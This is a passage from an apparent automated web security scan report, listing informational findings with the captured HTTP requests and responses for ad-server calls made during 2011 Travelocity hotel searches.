Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nauss482;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DAPPEROPTOUT2=OPT-OUT

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Mon, 03 Oct 2011 00:11:44 GMT
Content-Type: text/html
Connection: keep-alive
ETag: "9ef694aa7b1cbe82215254ec01ccb883"
X-CF1: fF.lax1:cf:cacheB.lax1-01
Last-Modified: Mon, 06 Jun 2011 20:17:35 GMT
X-CF2: L
Content-Length: 5454

<html>
<head>

<script type="text/javascript">
//<!--
// var COOKIE_NAME = intent.getFieldValue("adId") + '_bucket';
var COOKIE_NAME = "expedia" + '_bucket';
var cookieTTL = 365; // TTL in days

try
...[SNIP]...
27.16. http://d.xp1.ru4.com/meta  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /meta

Request

GET /meta?_o=179638&_t=cmcont&ssv_ptnr=pm HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:54 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1295
X-Cnection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<script type="text
...[SNIP]...
27.17. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:26 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:26 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2262
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...
27.18. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219§ion=details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:46 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:46 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2276
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...
27.19. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:01 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmati
...[SNIP]...
27.20. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:28 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:28 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmati
...[SNIP]...
27.21. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:25 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:25 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic
...[SNIP]...
27.22. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219§ion=details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:44 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:44 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic
...[SNIP]...
27.23. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Request

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:13 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:13 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 884
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=83479&AdID=152818&TargetID=8870&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,2230
...[SNIP]...
27.24. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 896
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125327&AdID=178801&TargetID=31769&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5714,5796,9520,10495,11148,12670,20052,20299,20311,22041,22251,22
...[SNIP]...
27.25. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&dest=BOS&random=042027615  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.2.9.1317600523363; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:48 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:48 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1399
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<head>
<style type="text/css">
body {background:#003366;margin:0;padding:0;color:#FFFFFF;font-family:Arial, Helvetica, sans-serif;font-si
...[SNIP]...
27.26. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&random=869493130  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&random=869493130? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do?Service=TRAVELOCITY&SearchPath=hots&old_cb=N&mode=1&x=53&y=14pax_cnt=2&city=&state=&dateLeavingMonth=10&dateLeavingDay=9&dateReturningMonth=10&dateReturningDay=16&adults=1&children=0&WA1=03010&WA2=away.com&WA3=cpc&WA4=45&WA5=trave_hotelbookingtab_awy_|u&WA6=hot&WA8=|,,
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
